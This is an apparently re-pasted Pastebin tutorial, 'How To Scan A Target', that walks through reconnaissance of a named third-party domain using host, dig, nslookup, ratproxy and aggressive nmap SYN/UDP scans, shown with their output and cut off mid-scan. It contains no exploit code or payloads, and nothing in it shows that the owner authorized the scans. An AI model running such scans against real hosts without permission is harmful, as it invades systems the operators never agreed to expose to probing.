API tools faq
paste
Advertisement
J4ck41

Untitled

J4ck41
May 30th, 2016
331
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 105.42 KB | None | 0 0
raw download clone embed print report
  1.  
  2. SHARE
  3. TWEET
  4. How To Scan A Target
  5. RobertoRaimondo May 29th, 2016 169 Never
  6. AD-BLOCK DETECTED - Please Support Pastebin By Buying A PRO Account
  7. For only $2.95 you can unlock loads of extra features, and support Pastebin's development at the same time.
  8. pastebin.com/pro
  9. rawdownloadcloneembedreportprint text 103.70 KB
  10.  
  11. HOW TO SCAN A TARGET
  12.  
  13. 1. First of all localize the target that you want to scan!
  14.  
  15. TARGET
  16.  
  17. http://www.vyxunbnbs.com
  18.  
  19.  
  20. HOW TO USE NSLOOKUP DIG HOST KNOCK TO GET DNS INFOS OF THE TARGET MACHINE:
  21.  
  22. ┌─[root@parrot]─[~]
  23. └──╼ #host vyxunbnbs.com
  24. vyxunbnbs.com has address 198.71.232.3
  25. vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
  26. vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
  27.  
  28. ┌─[✗]─[root@parrot]─[~]
  29. └──╼ #host -t a vyxunbnbs.com
  30. vyxunbnbs.com has address 198.71.232.3
  31.  
  32. ┌─[root@parrot]─[~]
  33. └──╼ #host -t mx vyxunbnbs.com
  34. vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
  35. vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
  36.  
  37. ┌─[root@parrot]─[~]
  38. └──╼ #host -t ns vyxunbnbs.com
  39. vyxunbnbs.com name server ns67.domaincontrol.com.
  40. vyxunbnbs.com name server ns68.domaincontrol.com.
  41.  
  42. ┌─[root@parrot]─[~]
  43. └──╼ #host -t txt vyxunbnbs.com
  44. vyxunbnbs.com has no TXT record
  45.  
  46. ┌─[root@parrot]─[~]
  47. └──╼ #host -t cname vyxunbnbs.com
  48. vyxunbnbs.com has no CNAME record
  49.  
  50. ┌─[root@parrot]─[~]
  51. └──╼ #host -t soa vyxunbnbs.com
  52. vyxunbnbs.com has SOA record ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
  53.  
  54. ┌─[root@parrot]─[~]
  55. └──╼ #host vyxunbnbs.com ns67.domaincontrol.com
  56. Using domain server:
  57. Name: ns67.domaincontrol.com
  58. Address: 216.69.185.44#53
  59. Aliases:
  60.  
  61. vyxunbnbs.com has address 198.71.232.3
  62. vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
  63. vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
  64.  
  65. ┌─[root@parrot]─[~]
  66. └──╼ #host vyxunbnbs.com ns68.domaincontrol.com
  67. Using domain server:
  68. Name: ns68.domaincontrol.com
  69. Address: 208.109.255.44#53
  70. Aliases:
  71.  
  72. vyxunbnbs.com has address 198.71.232.3
  73. vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
  74. vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
  75.  
  76. ┌─[root@parrot]─[~]
  77. └──╼ #host -a vyxunbnbs.com
  78. Trying "vyxunbnbs.com"
  79. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5689
  80. ;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
  81.  
  82. ;; QUESTION SECTION:
  83. ;vyxunbnbs.com. IN ANY
  84.  
  85. ;; ANSWER SECTION:
  86. vyxunbnbs.com. 510 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
  87. vyxunbnbs.com. 455 IN A 198.71.232.3
  88. vyxunbnbs.com. 2112 IN MX 0 smtp.secureserver.net.
  89. vyxunbnbs.com. 2112 IN MX 10 mailstore1.secureserver.net.
  90. vyxunbnbs.com. 3455 IN NS ns67.domaincontrol.com.
  91. vyxunbnbs.com. 3455 IN NS ns68.domaincontrol.com.
  92.  
  93. Received 209 bytes from 127.0.0.1#53 in 18 ms
  94.  
  95. ┌─[root@parrot]─[~]
  96. └──╼ #host -t any vyxunbnbs.com
  97. vyxunbnbs.com has SOA record ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
  98. vyxunbnbs.com has address 198.71.232.3
  99. vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
  100. vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
  101. vyxunbnbs.com name server ns68.domaincontrol.com.
  102. vyxunbnbs.com name server ns67.domaincontrol.com.
  103.  
  104. ┌─[root@parrot]─[~]
  105. └──╼ #host -6 vyxunbnbs.com
  106. vyxunbnbs.com has address 198.71.232.3
  107. vyxunbnbs.com mail is handled by 0 smtp.secureserver.net.
  108. vyxunbnbs.com mail is handled by 10 mailstore1.secureserver.net.
  109.  
  110. ┌─[root@parrot]─[~]
  111. └──╼ #host -6 -a vyxunbnbs.com
  112. Trying "vyxunbnbs.com"
  113. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14190
  114. ;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 0
  115.  
  116. ;; QUESTION SECTION:
  117. ;vyxunbnbs.com. IN ANY
  118.  
  119. ;; ANSWER SECTION:
  120. vyxunbnbs.com. 471 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
  121. vyxunbnbs.com. 416 IN A 198.71.232.3
  122. vyxunbnbs.com. 2073 IN MX 10 mailstore1.secureserver.net.
  123. vyxunbnbs.com. 2073 IN MX 0 smtp.secureserver.net.
  124. vyxunbnbs.com. 3416 IN NS ns67.domaincontrol.com.
  125. vyxunbnbs.com. 3416 IN NS ns68.domaincontrol.com.
  126.  
  127. Received 209 bytes from ::1#53 in 14 ms
  128.  
  129. ┌─[✗]─[root@parrot]─[~]
  130. └──╼ #host -6 vyxunbnbs.com ns67.domaincontrol.com
  131. ;; connection timed out; no servers could be reached
  132.  
  133. ┌─[✗]─[root@parrot]─[~]
  134. └──╼ #host -6 vyxunbnbs.com ns68.domaincontrol.com
  135. ;; connection timed out; no servers could be reached
  136.  
  137. ┌─[✗]─[root@parrot]─[~]
  138. └──╼ #host -6 -t ns vyxunbnbs.com ns68.domaincontrol.com
  139. ;; connection timed out; no servers could be reached
  140.  
  141. ┌─[✗]─[root@parrot]─[~]
  142. └──╼ #host -6 -t ns vyxunbnbs.com ns67.domaincontrol.com
  143. ;; connection timed out; no servers could be reached
  144.  
  145. ┌─[✗]─[root@parrot]─[~]
  146. └──╼ #host 198.71.232.3
  147. 3.232.71.198.in-addr.arpa domain name pointer ip-198-71-232-3.ip.secureserver.net.
  148.  
  149. ┌─[root@parrot]─[~]
  150. └──╼ #host -v -t a vyxunbnbs.com
  151. Trying "vyxunbnbs.com"
  152. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 21861
  153. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
  154.  
  155. ;; QUESTION SECTION:
  156. ;vyxunbnbs.com. IN A
  157.  
  158. ;; ANSWER SECTION:
  159. vyxunbnbs.com. 259 IN A 198.71.232.3
  160.  
  161. Received 47 bytes from 127.0.0.1#53 in 1 ms
  162.  
  163. ┌─[root@parrot]─[~]
  164. └──╼ #host -v -t a ip-198-71-232-3.ip.secureserver.net
  165. Trying "ip-198-71-232-3.ip.secureserver.net"
  166. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 38259
  167. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
  168.  
  169. ;; QUESTION SECTION:
  170. ;ip-198-71-232-3.ip.secureserver.net. IN A
  171.  
  172. ;; ANSWER SECTION:
  173. ip-198-71-232-3.ip.secureserver.net. 3600 IN A 198.71.232.3
  174.  
  175. Received 69 bytes from 127.0.0.1#53 in 44 ms
  176.  
  177. ┌─[root@parrot]─[~]
  178. └──╼ #dig vyxunbnbs.com a
  179.  
  180. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com a
  181. ;; global options: +cmd
  182. ;; Got answer:
  183. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 8729
  184. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  185.  
  186. ;; OPT PSEUDOSECTION:
  187. ; EDNS: version: 0, flags:; udp: 4096
  188. ;; QUESTION SECTION:
  189. ;vyxunbnbs.com. IN A
  190.  
  191. ;; ANSWER SECTION:
  192. vyxunbnbs.com. 164 IN A 198.71.232.3
  193.  
  194. ;; Query time: 0 msec
  195. ;; SERVER: 127.0.0.1#53(127.0.0.1)
  196. ;; WHEN: Sun May 29 14:18:00 CEST 2016
  197. ;; MSG SIZE rcvd: 58
  198.  
  199. ┌─[root@parrot]─[~]
  200. └──╼ #dig vyxunbnbs.com mx
  201.  
  202. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com mx
  203. ;; global options: +cmd
  204. ;; Got answer:
  205. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62678
  206. ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
  207.  
  208. ;; OPT PSEUDOSECTION:
  209. ; EDNS: version: 0, flags:; udp: 4096
  210. ;; QUESTION SECTION:
  211. ;vyxunbnbs.com. IN MX
  212.  
  213. ;; ANSWER SECTION:
  214. vyxunbnbs.com. 1816 IN MX 10 mailstore1.secureserver.net.
  215. vyxunbnbs.com. 1816 IN MX 0 smtp.secureserver.net.
  216.  
  217. ;; Query time: 19 msec
  218. ;; SERVER: 127.0.0.1#53(127.0.0.1)
  219. ;; WHEN: Sun May 29 14:18:04 CEST 2016
  220. ;; MSG SIZE rcvd: 106
  221.  
  222. ┌─[root@parrot]─[~]
  223. └──╼ #dig vyxunbnbs.com ns
  224.  
  225. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com ns
  226. ;; global options: +cmd
  227. ;; Got answer:
  228. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 60292
  229. ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
  230.  
  231. ;; OPT PSEUDOSECTION:
  232. ; EDNS: version: 0, flags:; udp: 4096
  233. ;; QUESTION SECTION:
  234. ;vyxunbnbs.com. IN NS
  235.  
  236. ;; ANSWER SECTION:
  237. vyxunbnbs.com. 3156 IN NS ns68.domaincontrol.com.
  238. vyxunbnbs.com. 3156 IN NS ns67.domaincontrol.com.
  239.  
  240. ;; Query time: 12 msec
  241. ;; SERVER: 127.0.0.1#53(127.0.0.1)
  242. ;; WHEN: Sun May 29 14:18:07 CEST 2016
  243. ;; MSG SIZE rcvd: 94
  244.  
  245. ┌─[root@parrot]─[~]
  246. └──╼ #dig vyxunbnbs.com txt
  247.  
  248. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com txt
  249. ;; global options: +cmd
  250. ;; Got answer:
  251. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36884
  252. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  253.  
  254. ;; OPT PSEUDOSECTION:
  255. ; EDNS: version: 0, flags:; udp: 4096
  256. ;; QUESTION SECTION:
  257. ;vyxunbnbs.com. IN TXT
  258.  
  259. ;; AUTHORITY SECTION:
  260. vyxunbnbs.com. 180 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
  261.  
  262. ;; Query time: 12 msec
  263. ;; SERVER: 127.0.0.1#53(127.0.0.1)
  264. ;; WHEN: Sun May 29 14:18:13 CEST 2016
  265. ;; MSG SIZE rcvd: 110
  266.  
  267. ┌─[root@parrot]─[~]
  268. └──╼ #dig vyxunbnbs.com soa
  269.  
  270. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com soa
  271. ;; global options: +cmd
  272. ;; Got answer:
  273. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39124
  274. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  275.  
  276. ;; OPT PSEUDOSECTION:
  277. ; EDNS: version: 0, flags:; udp: 4096
  278. ;; QUESTION SECTION:
  279. ;vyxunbnbs.com. IN SOA
  280.  
  281. ;; ANSWER SECTION:
  282. vyxunbnbs.com. 200 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
  283.  
  284. ;; Query time: 12 msec
  285. ;; SERVER: 127.0.0.1#53(127.0.0.1)
  286. ;; WHEN: Sun May 29 14:18:18 CEST 2016
  287. ;; MSG SIZE rcvd: 110
  288.  
  289. ┌─[root@parrot]─[~]
  290. └──╼ #dig vyxunbnbs.com cname
  291.  
  292. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com cname
  293. ;; global options: +cmd
  294. ;; Got answer:
  295. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 22218
  296. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  297.  
  298. ;; OPT PSEUDOSECTION:
  299. ; EDNS: version: 0, flags:; udp: 4096
  300. ;; QUESTION SECTION:
  301. ;vyxunbnbs.com. IN CNAME
  302.  
  303. ;; AUTHORITY SECTION:
  304. vyxunbnbs.com. 171 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
  305.  
  306. ;; Query time: 18 msec
  307. ;; SERVER: 127.0.0.1#53(127.0.0.1)
  308. ;; WHEN: Sun May 29 14:18:38 CEST 2016
  309. ;; MSG SIZE rcvd: 110
  310.  
  311. ┌─[root@parrot]─[~]
  312. └──╼ #dig +trace vyxunbnbs.com
  313.  
  314. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> +trace vyxunbnbs.com
  315. ;; global options: +cmd
  316. . 287648 IN NS c.root-servers.net.
  317. . 287648 IN NS i.root-servers.net.
  318. . 287648 IN NS d.root-servers.net.
  319. . 287648 IN NS a.root-servers.net.
  320. . 287648 IN NS f.root-servers.net.
  321. . 287648 IN NS b.root-servers.net.
  322. . 287648 IN NS l.root-servers.net.
  323. . 287648 IN NS k.root-servers.net.
  324. . 287648 IN NS g.root-servers.net.
  325. . 287648 IN NS e.root-servers.net.
  326. . 287648 IN NS m.root-servers.net.
  327. . 287648 IN NS h.root-servers.net.
  328. . 287648 IN NS j.root-servers.net.
  329. . 510154 IN RRSIG NS 8 0 518400 20160608050000 20160529040000 60615 . LS0Bk52wYFCmp8Sk08+ePPeZV1ar3AciH05VrH5wlzpc5L1j7fW+Td6b 6yN+34QBVGQ+U0YqDCg8K63nUFxdEY1zGW2v9YjzvdNwVI7UnLIpqNK7 KNny7GHnoS/iB5T6wGeoXlJrlmCqGrhtbAuXdlkbViOELcbpK5ZvGs6L w3s=
  330. ;; Received 397 bytes from 127.0.0.1#53(127.0.0.1) in 264 ms
  331.  
  332. com. 172800 IN NS l.gtld-servers.net.
  333. com. 172800 IN NS c.gtld-servers.net.
  334. com. 172800 IN NS f.gtld-servers.net.
  335. com. 172800 IN NS h.gtld-servers.net.
  336. com. 172800 IN NS b.gtld-servers.net.
  337. com. 172800 IN NS k.gtld-servers.net.
  338. com. 172800 IN NS e.gtld-servers.net.
  339. com. 172800 IN NS j.gtld-servers.net.
  340. com. 172800 IN NS m.gtld-servers.net.
  341. com. 172800 IN NS i.gtld-servers.net.
  342. com. 172800 IN NS g.gtld-servers.net.
  343. com. 172800 IN NS a.gtld-servers.net.
  344. com. 172800 IN NS d.gtld-servers.net.
  345. com. 86400 IN DS 30909 8 2 E2D3C916F6DEEAC73294E8268FB5885044A833FC5459588F4A9184CF C41A5766
  346. com. 86400 IN RRSIG DS 8 1 86400 20160608050000 20160529040000 60615 . D/SvLl6M/vyF6MOKUE220+xQgbpwKHLA+7eJedh6oJwvXiXB6QAPalag hfjxDtzqQ71OYQk0TyOOcW2CaTqduszIQjf/ckB9RAds1aip3b+BWMvq lSFtLCuKsFmKZkkAhhlNZRyVFc9s8wLW+G/RL52sQpRGMBLo3etB2/uX ckg=
  347. ;; Received 737 bytes from 192.36.148.17#53(i.root-servers.net) in 305 ms
  348.  
  349. vyxunbnbs.com. 172800 IN NS ns67.domaincontrol.com.
  350. vyxunbnbs.com. 172800 IN NS ns68.domaincontrol.com.
  351. CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN NSEC3 1 1 0 - CK0Q1GIN43N1ARRC9OSM6QPQR81H5M9A NS SOA RRSIG DNSKEY NSEC3PARAM
  352. CK0POJMG874LJREF7EFN8430QVIT8BSM.com. 86400 IN RRSIG NSEC3 8 2 86400 20160603045915 20160527034915 34745 com. pkQ5LWptuG019VnVIJOYy/noEwncYk2kml2Qkf+aTLF7lPHdRvcCkC0h ruJdoZAMHgX7byAmPSR9vi8q6OvKdXVmsMKfUBdLMNMpUhaBHpcTe1AI ezemeJmvAjVyqo7wVYwGa1/Y9ZHuUC9zKmc1xGbtP+jB/GiZHz9vShwH ohc=
  353. 9M14O3KSMS2015V8C22L03OVH85RIG84.com. 86400 IN NSEC3 1 1 0 - 9M17MO9DKQOAC1TE5B8KURUTFNKS98J7 NS DS RRSIG
  354. 9M14O3KSMS2015V8C22L03OVH85RIG84.com. 86400 IN RRSIG NSEC3 8 2 86400 20160604043916 20160528032916 34745 com. Cfkvje5CuuZtOQPGsBBMYJm3/6g3IRh7U6QorY6chCMhRiMWGAXKTwQL 84cGbqkma5Iz9A3BwYRdSqx9u27Ou2QA3ipt8zKJaD6ed0IeI2SbU8QZ HLuKxAcheIIqTf1pHy2cvkEjMDW6k3EHqdKR1goBKrESteb7ZPW7v0hY ih8=
  355. ;; Received 611 bytes from 192.5.6.30#53(a.gtld-servers.net) in 122 ms
  356.  
  357. vyxunbnbs.com. 600 IN A 198.71.232.3
  358. vyxunbnbs.com. 3600 IN NS ns68.domaincontrol.com.
  359. vyxunbnbs.com. 3600 IN NS ns67.domaincontrol.com.
  360. ;; Received 110 bytes from 208.109.255.44#53(ns68.domaincontrol.com) in 30 ms
  361.  
  362. ┌─[root@parrot]─[~]
  363. └──╼ #dig +short vyxunbnbs.com
  364. 198.71.232.3
  365.  
  366. ┌─[root@parrot]─[~]
  367. └──╼ #dig +noall +answer vyxunbnbs.com any
  368. vyxunbnbs.com. 108 IN SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600
  369. vyxunbnbs.com. 53 IN A 198.71.232.3
  370. vyxunbnbs.com. 1710 IN MX 0 smtp.secureserver.net.
  371. vyxunbnbs.com. 1710 IN MX 10 mailstore1.secureserver.net.
  372. vyxunbnbs.com. 3053 IN NS ns67.domaincontrol.com.
  373. vyxunbnbs.com. 3053 IN NS ns68.domaincontrol.com.
  374.  
  375. ┌─[root@parrot]─[~]
  376. └──╼ #dig -x +short 198.71.232.3
  377.  
  378. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> -x +short 198.71.232.3
  379. ;; global options: +cmd
  380. ;; Got answer:
  381. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 54927
  382. ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
  383.  
  384. ;; OPT PSEUDOSECTION:
  385. ; EDNS: version: 0, flags:; udp: 4096
  386. ;; QUESTION SECTION:
  387. ;+short.in-addr.arpa. IN PTR
  388.  
  389. ;; AUTHORITY SECTION:
  390. in-addr.arpa. 3599 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2015073655 1800 900 604800 3600
  391.  
  392. ;; Query time: 11 msec
  393. ;; SERVER: ::1#53(::1)
  394. ;; WHEN: Sun May 29 14:21:01 CEST 2016
  395. ;; MSG SIZE rcvd: 116
  396.  
  397. ;; Got answer:
  398. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 27483
  399. ;; flags: qr aa rd ra ad; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  400.  
  401. ;; OPT PSEUDOSECTION:
  402. ; EDNS: version: 0, flags:; udp: 4096
  403. ;; QUESTION SECTION:
  404. ;198.71.232.3. IN A
  405.  
  406. ;; ANSWER SECTION:
  407. 198.71.232.3. 0 IN A 198.71.232.3
  408.  
  409. ;; Query time: 0 msec
  410. ;; SERVER: 127.0.0.1#53(127.0.0.1)
  411. ;; WHEN: Sun May 29 14:21:01 CEST 2016
  412. ;; MSG SIZE rcvd: 57
  413.  
  414. ┌─[root@parrot]─[~]
  415. └──╼ #dig -x 198.71.232.3 +short
  416. ip-198-71-232-3.ip.secureserver.net.
  417.  
  418. ┌─[root@parrot]─[~]
  419. └──╼ #dig +nssearch vyxunbnbs.com
  420. SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600 from server 216.69.185.44 in 30 ms.
  421. SOA ns67.domaincontrol.com. dns.jomax.net. 2016052700 28800 7200 604800 600 from server 208.109.255.44 in 30 ms.
  422. ;; connection timed out; no servers could be reached
  423.  
  424. ┌─[✗]─[root@parrot]─[~]
  425. └──╼ #dig +nocmd +noall +answer a vyxunbnbs.com
  426. vyxunbnbs.com. 600 IN A 198.71.232.3
  427.  
  428. ┌─[root@parrot]─[~]
  429. └──╼ #dig +nocmd +noall +answer mx vyxunbnbs.com
  430. vyxunbnbs.com. 1529 IN MX 0 smtp.secureserver.net.
  431. vyxunbnbs.com. 1529 IN MX 10 mailstore1.secureserver.net.
  432.  
  433. ┌─[root@parrot]─[~]
  434. └──╼ #dig +nocmd +noall +answer ns vyxunbnbs.com
  435. vyxunbnbs.com. 2868 IN NS ns67.domaincontrol.com.
  436. vyxunbnbs.com. 2868 IN NS ns68.domaincontrol.com.
  437.  
  438. ┌─[root@parrot]─[~]
  439. └──╼ #dig +nocmd +noall +answer cname vyxunbnbs.com
  440.  
  441. ┌─[root@parrot]─[~]
  442. └──╼ #dig +nocmd +noall +answer txt vyxunbnbs.com
  443.  
  444. ┌─[root@parrot]─[~]
  445. └──╼ #dig +nocmd +noall +answer url vyxunbnbs.com
  446. vyxunbnbs.com. 554 IN A 198.71.232.3
  447.  
  448. ┌─[root@parrot]─[~]
  449. └──╼ #dig vyxunbnbs.com +dnssec
  450.  
  451. ; <<>> DiG 9.9.5-9+deb8u5-Debian <<>> vyxunbnbs.com +dnssec
  452. ;; global options: +cmd
  453. ;; Got answer:
  454. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12137
  455. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
  456.  
  457. ;; OPT PSEUDOSECTION:
  458. ; EDNS: version: 0, flags: do; udp: 4096
  459. ;; QUESTION SECTION:
  460. ;vyxunbnbs.com. IN A
  461.  
  462. ;; ANSWER SECTION:
  463. vyxunbnbs.com. 446 IN A 198.71.232.3
  464.  
  465. ;; Query time: 16 msec
  466. ;; SERVER: 127.0.0.1#53(127.0.0.1)
  467. ;; WHEN: Sun May 29 15:14:48 CEST 2016
  468. ;; MSG SIZE rcvd: 58
  469.  
  470. ┌─[root@parrot]─[/home/roy/Desktop]
  471. └──╼ #nslookup
  472. > set type=A
  473. > www.vyxunbnbs.com
  474. Server: 127.0.0.1
  475. Address: 127.0.0.1#53
  476.  
  477. Non-authoritative answer:
  478. www.vyxunbnbs.com canonical name = vyxunbnbs.com.
  479. Name: vyxunbnbs.com
  480. Address: 198.71.232.3
  481. > set type=MX
  482. > www.vyxunbnbs.com
  483. Server: 127.0.0.1
  484. Address: 127.0.0.1#53
  485.  
  486. Non-authoritative answer:
  487. www.vyxunbnbs.com canonical name = vyxunbnbs.com.
  488. vyxunbnbs.com mail exchanger = 0 smtp.secureserver.net.
  489. vyxunbnbs.com mail exchanger = 10 mailstore1.secureserver.net.
  490.  
  491. Authoritative answers can be found from:
  492. > set type=ns
  493. > www.vyxunbnbs.com
  494. Server: 127.0.0.1
  495. Address: 127.0.0.1#53
  496.  
  497. Non-authoritative answer:
  498. www.vyxunbnbs.com canonical name = vyxunbnbs.com.
  499. vyxunbnbs.com nameserver = ns68.domaincontrol.com.
  500. vyxunbnbs.com nameserver = ns67.domaincontrol.com.
  501.  
  502. Authoritative answers can be found from:
  503. > set type=cname
  504. > www.vyxunbnbs.com
  505. Server: 127.0.0.1
  506. Address: 127.0.0.1#53
  507.  
  508. www.vyxunbnbs.com canonical name = vyxunbnbs.com.
  509.  
  510. ┌─[root@parrot]─[~]
  511. └──╼ #nslookup
  512. > set type=TXT
  513. > www.vyxunbnbs.com
  514. Server: 127.0.0.1
  515. Address: 127.0.0.1#53
  516.  
  517. Non-authoritative answer:
  518. www.vyxunbnbs.com canonical name = vyxunbnbs.com.
  519.  
  520. Authoritative answers can be found from:
  521. vyxunbnbs.com
  522. origin = ns67.domaincontrol.com
  523. mail addr = dns.jomax.net
  524. serial = 2016052700
  525. refresh = 28800
  526. retry = 7200
  527. expire = 604800
  528. minimum = 600
  529. >
  530.  
  531. > set type=SOA
  532. > www.vyxunbnbs.com
  533. Server: 127.0.0.1
  534. Address: 127.0.0.1#53
  535.  
  536. Non-authoritative answer:
  537. www.vyxunbnbs.com canonical name = vyxunbnbs.com.
  538. vyxunbnbs.com
  539. origin = ns67.domaincontrol.com
  540. mail addr = dns.jomax.net
  541. serial = 2016052700
  542. refresh = 28800
  543. retry = 7200
  544. expire = 604800
  545. minimum = 600
  546.  
  547. Authoritative answers can be found from:
  548. >
  549.  
  550.  
  551. RUN RATPROXY
  552.  
  553. ┌─[root@parrot]─[~]
  554. └──╼ #ratproxy
  555. ratproxy version 1.58-beta by <lcamtuf@google.com>
  556.  
  557. [!] WARNING: Running with no command-line config options specified. This is
  558. almost certainly not what you want, as most checks are disabled. Please
  559. consult the documentation or use --help for more information.
  560.  
  561. [*] Proxy configured successfully. Have fun, and please do not be evil.
  562. [+] Accepting connections on port 8080/tcp (local only)...
  563.  
  564. do not close the window...minimize it and open a new terminal!
  565.  
  566.  
  567. RUN NMAP
  568.  
  569. ┌─[✗]─[root@parrot]─[~]
  570. └──╼ #nmap -sV -Pn 198.71.232.3
  571.  
  572. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 12:03 CEST
  573. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
  574. Nmap scan report for 198.71.232.3
  575. Host is up (0.11s latency).
  576. Not shown: 998 filtered ports
  577. PORT STATE SERVICE VERSION
  578. 80/tcp open http Samsung AllShare httpd
  579. 443/tcp open ssl/http Samsung AllShare httpd
  580.  
  581. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  582. Nmap done: 1 IP address (1 host up) scanned in 26.28 seconds
  583.  
  584.  
  585. ┌─[root@parrot]─[~]
  586. └──╼ #nmap -sS -sU -T4 -A -v 198.71.232.3
  587.  
  588. Starting Nmap 7.01 ( https://nmap.org ) at 2016-05-29 12:04 CEST
  589. NSE: Loaded 132 scripts for scanning.
  590. NSE: Script Pre-scanning.
  591. Initiating NSE at 12:04
  592. Completed NSE at 12:04, 0.00s elapsed
  593. Initiating NSE at 12:04
  594. Completed NSE at 12:04, 0.00s elapsed
  595. Initiating Ping Scan at 12:04
  596. Scanning 198.71.232.3 [4 ports]
  597. Completed Ping Scan at 12:04, 0.11s elapsed (1 total hosts)
  598. mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
  599. Initiating SYN Stealth Scan at 12:04
  600. Scanning 198.71.232.3 [1000 ports]
  601. Discovered open port 443/tcp on 198.71.232.3
  602. Discovered open port 80/tcp on 198.71.232.3
  603. Completed SYN Stealth Scan at 12:04, 9.18s elapsed (1000 total ports)
  604. Initiating UDP Scan at 12:04
  605. Scanning 198.71.232.3 [1000 ports]
  606. Completed UDP Scan at 12:05, 5.55s elapsed (1000 total ports)
  607. Initiating Service scan at 12:05
  608. Scanning 1002 services on 198.71.232.3
  609. Service scan Timing: About 0.40% done
  610. Service scan Timing: About 3.29% done; ETC: 13:33 (1:25:39 remaining)
  611. Service scan Timing: About 6.29% done; ETC: 13:14 (1:05:05 remaining)
  612. Service scan Timing: About 9.28% done; ETC: 13:07 (0:57:01 remaining)
  613. Service scan Timing: About 12.28% done; ETC: 13:04 (0:52:10 remaining)
  614. Service scan Timing: About 15.27% done; ETC: 13:02 (0:48:33 remaining)
  615. Service scan Timing: About 20.86% done; ETC: 12:54 (0:39:05 remaining)
  616. Service scan Timing: About 21.26% done; ETC: 12:59 (0:43:13 remaining)
  617. Service scan Timing: About 26.75% done; ETC: 12:54 (0:36:12 remaining)
  618. Service scan Timing: About 27.25% done; ETC: 12:58 (0:38:57 remaining)
  619. Service scan Timing: About 32.73% done; ETC: 12:54 (0:33:09 remaining)
  620. Service scan Timing: About 38.72% done; ETC: 12:54 (0:30:09 remaining)
  621. Service scan Timing: About 44.71% done; ETC: 12:54 (0:27:10 remaining)
  622. Service scan Timing: About 50.70% done; ETC: 12:54 (0:24:12 remaining)
  623. Service scan Timing: About 56.69% done; ETC: 12:54 (0:21:14 remaining)
  624. Service scan Timing: About 62.67% done; ETC: 12:54 (0:18:18 remaining)
  625. Service scan Timing: About 68.56% done; ETC: 12:54 (0:15:25 remaining)
  626. Service scan Timing: About 74.55% done; ETC: 12:54 (0:12:29 remaining)
  627. Service scan Timing: About 80.54% done; ETC: 12:54 (0:09:32 remaining)
